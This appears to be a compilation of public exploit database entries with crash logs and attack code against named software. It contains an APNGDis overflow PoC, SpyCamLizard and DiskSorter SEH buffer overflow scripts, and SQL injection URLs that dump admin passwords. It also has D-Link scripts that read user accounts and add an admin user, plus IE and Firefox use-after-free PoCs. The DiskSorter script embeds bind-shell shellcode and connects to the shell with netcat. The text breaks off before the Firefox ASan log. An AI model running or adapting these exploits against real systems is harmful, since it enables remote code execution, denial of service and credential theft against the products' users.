==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid write of size 8
==10563== at 0x4C30265: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edbad8 is 30,600 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid read of size 8
==10563== at 0x4C30272: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x5edb3b8 is 28,776 bytes inside a block of size 65,593 free'd
==10563== at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==10563== by 0x54CF643: png_destroy_read_struct (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109E20: processing_finish(png_struct_def*, png_info_def*) (apngdis.cpp:176)
==10563== by 0x10A9FD: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:361)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Block was alloc'd at
==10563== at 0x4C2BBAF: malloc (vg_replace_malloc.c:299)
==10563== by 0x54C97CD: png_malloc (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54DAF2D: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CD3B0: png_read_update_info (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109838: info_fn(png_struct_def*, png_info_def*) (apngdis.cpp:58)
==10563== by 0x54CA2E0: ??? (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x54CAFBA: png_process_data (in /usr/lib/x86_64-linux-gnu/libpng16.so.16.28.0)
==10563== by 0x109D41: processing_data(png_struct_def*, png_info_def*, unsigned char*, unsigned int) (apngdis.cpp:158)
==10563== by 0x10A891: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:337)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== Invalid read of size 8
==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==10563==
==10563==
==10563== Process terminating with default action of signal 11 (SIGSEGV)
==10563== Access not within mapped region at address 0x0
==10563== at 0x4C30140: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1017)
==10563== by 0x109924: compose_frame(unsigned char**, unsigned char**, unsigned char, unsigned int, unsigned int, unsigned int, unsigned int) (apngdis.cpp:78)
==10563== by 0x10AA40: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:363)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563== If you believe this happened as a result of a stack
==10563== overflow in your program's main thread (unlikely but
==10563== possible), you can try to increase the size of the
==10563== main thread stack using the --main-stacksize= flag.
==10563== The main thread stack size used in this run was 8388608.
==10563==
==10563== HEAP SUMMARY:
==10563== in use at exit: 16,777,901 bytes in 10 blocks
==10563== total heap usage: 24 allocs, 14 frees, 16,997,058 bytes allocated
==10563==
==10563== 64 bytes in 2 blocks are definitely lost in loss record 6 of 9
==10563== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423)
==10563== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112)
==10563== by 0x10A24D: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:244)
==10563== by 0x10B24E: main (apngdis.cpp:498)
==10563==
==10563== LEAK SUMMARY:
==10563== definitely lost: 64 bytes in 2 blocks
==10563== indirectly lost: 0 bytes in 0 blocks
==10563== possibly lost: 0 bytes in 0 blocks
==10563== still reachable: 16,777,837 bytes in 8 blocks
==10563== suppressed: 0 bytes in 0 blocks
==10563== Reachable blocks (those to which a pointer was found) are not shown.
==10563== To see them, rerun with: --leak-check=full --show-leak-kinds=all
==10563==
==10563== For counts of detected and suppressed errors, rerun with: -v
==10563== ERROR SUMMARY: 1028641 errors from 5 contexts (suppressed: 0 from 0)
Segmentation fault
w_h_chunk_poc.png
# Exploit Title: APNGDis chunk size descriptor Buffer Overflow
# Date: 14-03-2017
# Exploit Author: Alwin Peppels
# Vendor Homepage: http://apngdis.sourceforge.net/
# Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
# Version: 2.8
# Tested on: Linux Debian / Windows 7
# CVE : CVE-2017-6192
Additional analysis:
https://www.onvio.nl/nieuws/cve-2017-6192
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41668.png
The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4
‰ P N G . . . . ÿ ÿ ÿ ô I H D R
89 50 4E 47 0D 0A 1A 0A FF FF FF F4 49 48 44 52
^ ^ ^ ^
Bash:
Reading '../ihdr_chunk_size_poc.png'...
*** Error in `./apngdis': free(): invalid next size (fast): 0x00005556a08d2270 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f932b0adbcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f932b0b3f96]
/lib/x86_64-linux-gnu/libc.so.6(+0x7778e)[0x7f932b0b478e]
./apngdis(+0x2e2f)[0x55569f636e2f]
./apngdis(+0x324f)[0x55569f63724f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f932b05d2b1]
./apngdis(+0x16ca)[0x55569f6356ca]
Valgrind:
Reading '../ihdr_chunk_size_poc.png'...
==10383== Invalid write of size 4
==10383== at 0x10B502: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:113)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383== Address 0x5ed3370 is 0 bytes after a block of size 0 alloc'd
==10383== at 0x4C2C93F: operator new[](unsigned long) (vg_replace_malloc.c:423)
==10383== by 0x10B4ED: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:112)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383==
==10383== Invalid write of size 1
==10383== at 0x4C330AD: __GI_mempcpy (vg_replace_strmem.c:1518)
==10383== by 0x5B94B0D: _IO_file_xsgetn (fileops.c:1400)
==10383== by 0x5B89AA8: fread (iofread.c:38)
==10383== by 0x10B52B: read_chunk(_IO_FILE*, CHUNK*) (apngdis.cpp:114)
==10383== by 0x109F96: load_apng(char*, std::vector<APNGFrame, std::allocator<APNGFrame> >&) (apngdis.cpp:206)
==10383== by 0x10B24E: main (apngdis.cpp:498)
==10383== Address 0x5ed338c is 28 bytes after a block of size 0 in arena "client"
==10383==
valgrind: m_mallocfree.c:303 (get_bszB_as_is): Assertion 'bszB_lo == bszB_hi' failed.
valgrind: Heap block lo/hi size mismatch: lo = 64, hi = 90194313415.
import socket
import sys
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
# Date: 2017.03.22
# Exploit Author: Greg Priest
# Version: SpyCamLizard v1.230
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''
print "SpyCamLizard DoS Exploit running!"
host = "192.168.56.1"
port = 80
overflow = "A" * 1189
nextSEH = "BBBB"
SEH = "CCCC"
overflow2= "D" * 3803
crash = overflow+nextSEH+SEH+overflow2
httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
httpsocket.close()
print "SpyCamLizard shutted down!"
#!/usr/bin/env python
# Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow (SEH)
# Date: 2017-03-22
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.disksorter.com
# Software Link: http://www.disksorter.com/setups/disksorterent_setup_v9.5.12.exe
# Version: 9.5.12
# Tested on: Windows 7 SP1 x86
import socket,os,time,struct
host = "192.168.2.186"
port = 80
#Bad Chars \x00\x09\x0a\x0d\x20"
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00\x09\x0a\x0d\x20" -f python
shellcode = ""
shellcode += "\xd9\xc0\xd9\x74\x24\xf4\x5e\xbf\xb0\x9b\x0e\xf2\x33"
shellcode += "\xc9\xb1\x53\x31\x7e\x17\x83\xee\xfc\x03\xce\x88\xec"
shellcode += "\x07\xd2\x47\x72\xe7\x2a\x98\x13\x61\xcf\xa9\x13\x15"
shellcode += "\x84\x9a\xa3\x5d\xc8\x16\x4f\x33\xf8\xad\x3d\x9c\x0f"
shellcode += "\x05\x8b\xfa\x3e\x96\xa0\x3f\x21\x14\xbb\x13\x81\x25"
shellcode += "\x74\x66\xc0\x62\x69\x8b\x90\x3b\xe5\x3e\x04\x4f\xb3"
shellcode += "\x82\xaf\x03\x55\x83\x4c\xd3\x54\xa2\xc3\x6f\x0f\x64"
shellcode += "\xe2\xbc\x3b\x2d\xfc\xa1\x06\xe7\x77\x11\xfc\xf6\x51"
shellcode += "\x6b\xfd\x55\x9c\x43\x0c\xa7\xd9\x64\xef\xd2\x13\x97"
shellcode += "\x92\xe4\xe0\xe5\x48\x60\xf2\x4e\x1a\xd2\xde\x6f\xcf"
shellcode += "\x85\x95\x7c\xa4\xc2\xf1\x60\x3b\x06\x8a\x9d\xb0\xa9"
shellcode += "\x5c\x14\x82\x8d\x78\x7c\x50\xaf\xd9\xd8\x37\xd0\x39"
shellcode += "\x83\xe8\x74\x32\x2e\xfc\x04\x19\x27\x31\x25\xa1\xb7"
shellcode += "\x5d\x3e\xd2\x85\xc2\x94\x7c\xa6\x8b\x32\x7b\xc9\xa1"
shellcode += "\x83\x13\x34\x4a\xf4\x3a\xf3\x1e\xa4\x54\xd2\x1e\x2f"
shellcode += "\xa4\xdb\xca\xda\xac\x7a\xa5\xf8\x51\x3c\x15\xbd\xf9"
shellcode += "\xd5\x7f\x32\x26\xc5\x7f\x98\x4f\x6e\x82\x23\x7e\x33"
shellcode += "\x0b\xc5\xea\xdb\x5d\x5d\x82\x19\xba\x56\x35\x61\xe8"
shellcode += "\xce\xd1\x2a\xfa\xc9\xde\xaa\x28\x7e\x48\x21\x3f\xba"
shellcode += "\x69\x36\x6a\xea\xfe\xa1\xe0\x7b\x4d\x53\xf4\x51\x25"
shellcode += "\xf0\x67\x3e\xb5\x7f\x94\xe9\xe2\x28\x6a\xe0\x66\xc5"
shellcode += "\xd5\x5a\x94\x14\x83\xa5\x1c\xc3\x70\x2b\x9d\x86\xcd"
shellcode += "\x0f\x8d\x5e\xcd\x0b\xf9\x0e\x98\xc5\x57\xe9\x72\xa4"
shellcode += "\x01\xa3\x29\x6e\xc5\x32\x02\xb1\x93\x3a\x4f\x47\x7b"
shellcode += "\x8a\x26\x1e\x84\x23\xaf\x96\xfd\x59\x4f\x58\xd4\xd9"
shellcode += "\x7f\x13\x74\x4b\xe8\xfa\xed\xc9\x75\xfd\xd8\x0e\x80"
shellcode += "\x7e\xe8\xee\x77\x9e\x99\xeb\x3c\x18\x72\x86\x2d\xcd"
shellcode += "\x74\x35\x4d\xc4"
#Buffer overflow
junk = "A" * 2487
#JMP Short = EB 05
nSEH = "\x90\x90\xEB\x05" #Jump short 5
#POP POP RET (libspp.dll)
SEH = struct.pack('<L',0x10015FFE)
#Generated by mona.py v2.0, rev 568 - Immunity Debugger
egg = "w00tw00t"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#NOPS
nops = "\x90"
#Payload
payload = junk + nSEH + SEH + egghunter + nops * 10 + egg + shellcode + nops * (6000 - len(junk) - len(nSEH) - len(SEH) - len(egghunter) - 10 - len(egg) - len(shellcode))
#HTTP Request
request = "GET /" + payload + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.connect((host,port))
socket.send(request)
socket.close()
print "Waiting for shell..."
time.sleep(10)
os.system("nc " + host + " 4444")
# # # # #
# Exploit Title: GLink Word Link Script v1.2.3 - SQL Injection
# Google Dork: N/A
# Date: 22.03.2017
# Vendor Homepage: http://www.tufat.com/
# Software: http://www.tufat.com/wp-content/uploads/sites/4/2015/zips/script_131.zip
# Demo: http://www.tufat.com/glink-word-link-script/
# Version: 1.2.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/url.php?id=[SQL]
# -1'+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass),9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-
# http://localhost/[PATH]/get_words.php?gid=[SQL]
# -1'+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+glink_admin_users--+-&step=3
# http://localhost/[PATH]/get_words.php?wid=[SQL]
# -1'+union+select+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-&gid=1&step=3
# Etc...
# # # # #
# # # # #
# Exploit Title: Joomla! Component Extra Search v2.2.8 - SQL Injection
# Google Dork: N/A
# Date: 21.03.2017
# Vendor Homepage: http://www.joomlaboat.com/
# Software: http://www.joomlaboat.com/extra-search
# Demo: http://www.joomlaboat.com/
# Version: 2.2.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_extrasearch&view=details&listing_id=1&establename=[SQL]
# http://localhost/[PATH]/index.php?option=com_extrasearch&controller=createusers&establename=[SQL]
# # # # #
================
get-user-info.py
================
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
"""Calls request functions sequentially."""
response = [None]
responseText = None
if(request_ip(response)):
# Success, possibly use response.
responseText = read_response(response[0])
print responseText
response[0].close()
else:
# Failure, cannot use response.
pass
def read_response(response):
""" Returns the text contained in the response. For example, the page HTML. Only handles the most common HTTP encodings."""
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read())
return gzip.GzipFile(fileobj=buf).read()
elif response.info().get('Content-Encoding') == 'deflate':
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(response.read())
inflated += decompress.flush()
return inflated
return response.read()
def request_ip(response):
"""Tries to request the URL. Returns True if the request was successful; false otherwise.
http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10
response -- After the function has finished, will possibly contain the response to the request.
"""
response[0] = None
try:
# Create request to URL.
import sys
ip = sys.argv[1]
print ip
req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)
# Set request headers.
req.add_header("Connection", "keep-alive")
req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
req.add_header("X-Requested-With", "XMLHttpRequest")
req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
req.add_header("Referer", "http://%s/www/login.html"% ip)
req.add_header("Accept-Encoding", "gzip, deflate, sdch")
req.add_header("Accept-Language", "en-US,en;q=0.8")
req.add_header("Cookie", "Language=en")
# Get response to request.
response[0] = urllib2.urlopen(req)
except urllib2.URLError, e:
# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
if not hasattr(e, "code"):
return False
response[0] = e
except:
return False
return True
make_requests()
===========
user_add.py
===========
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
def make_requests():
"""Calls request functions sequentially."""
response = [None]
responseText = None
if(request_ip(response)):
# Success, possibly use response.
responseText = read_response(response[0])
print "Username dlinktest is successfully Added"
response[0].close()
else:
# Failure, cannot use response.
print "locha"
pass
def read_response(response):
""" Returns the text contained in the response. For example, the page HTML. Only handles the most common HTTP encodings."""
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO(response.read())
return gzip.GzipFile(fileobj=buf).read()
elif response.info().get('Content-Encoding') == 'deflate':
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(response.read())
inflated += decompress.flush()
return inflated
return response.read()
def request_ip(response):
"""Tries to request the URL. Returns True if the request was successful; false otherwise.
http://ip_address/form/User_Accounts_Apply
response -- After the function has finished, will possibly contain the response to the request.
"""
response[0] = None
try:
# Create request to URL.
import sys
ip = sys.argv[1]
req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)
# Set request headers.
req.add_header("Connection", "keep-alive")
req.add_header("Cache-Control", "max-age=0")
req.add_header("Origin", "http://%s/"% ip)
req.add_header("Upgrade-Insecure-Requests", "1")
req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
req.add_header("Content-Type", "application/x-www-form-urlencoded")
req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
req.add_header("Referer", "http://%s/www/login.html"% ip)
req.add_header("Accept-Encoding", "gzip, deflate")
req.add_header("Accept-Language", "en-US,en;q=0.8")
# Set request body.
body = "action=0&username=admin2&privilege=15&type=0&password=admin2"
# Get response to request.
response[0] = urllib2.urlopen(req, body)
except urllib2.URLError, e:
# URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
if not hasattr(e, "code"):
return False
response[0] = e
except:
return False
return True
make_requests()
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1076
There is an use-after-free bug in IE which can lead to info leak / memory disclosure.
The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38)
PoC:
=========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
function run() {
var textarea = document.getElementById("textarea");
var frame = document.createElement("iframe");
textarea.appendChild(frame);
frame.contentDocument.onreadystatechange = eventhandler;
form.reset();
}
function eventhandler() {
document.getElementById("textarea").defaultValue = "foo";
alert("Text value freed, can be reallocated here");
}
</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>
<!--
=========================================
Please also see the attached screenshots that demonstrate using the PoC for memory disclosure.
The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at
(b5c.f44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000
eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
msvcrt!wcscpy_s+0x46:
7582c006 0fb706 movzx eax,word ptr [esi] ds:002b:0e024ffc=????
0:008> k
# ChildEBP RetAddr
00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46
01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa
02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79
03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f
04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157
05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33
06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d
07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10
09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49
0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8
0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
0c 0a3ab5c0 706bda16 0x9780fd9
0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62
0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0f 0a3ab990 706b6d73 0x9780fe1
10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42
13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2
14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7
15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a
16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d
17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210
18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42
19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150
1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5
1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90
1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146
1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0
1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed
1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d
20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12
21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c
22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103
23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23
24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109
25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5
26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf
27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7
29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67
2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe
2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70
2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b
where the old value was deleated at
0:008> !heap -p -a 0e024ffc
address 0e024ffc found in
_DPH_HEAP_ROOT @ f1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
dd03820: e024000 2000
7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033
77b6de86 ntdll!RtlReAllocateHeap+0x00000054
71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215
71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026
71b8f446 MSHTML!_HeapRealloc<0>+0x00000011
7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546
71678877 MSHTML!CBase::put_StringHelper+0x0000004d
71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070
706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d
706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138
706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable.
Screenshots:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41661.zip
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1130
Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340138
There is a use-after-free security vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build.
PoC and ASan log can be found below.
Notes for reproducing:
- PoC uses domFuzzLite3 extension (https://www.squarefree.com/extensions/domFuzzLite3.xpi) in order to trigger the garbage collecor
- After the PoC is opened, it takes about 10 seconds for the crash to occur
PoC:
=================================================================
-->
<style>
body { display: table }
</style>
<script>
function freememory() {
try { fuzzPriv.forceGC(); } catch(err) { alert('Please install domFuzzLite3'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freememory()
}
</script>
<body onload=go()>
<table>
<th>u~Z1Cqn`aA}SOkre=]{</th>
</table>
<progress></progress>
<!--
=================================================================
ASan log:
=================================================================
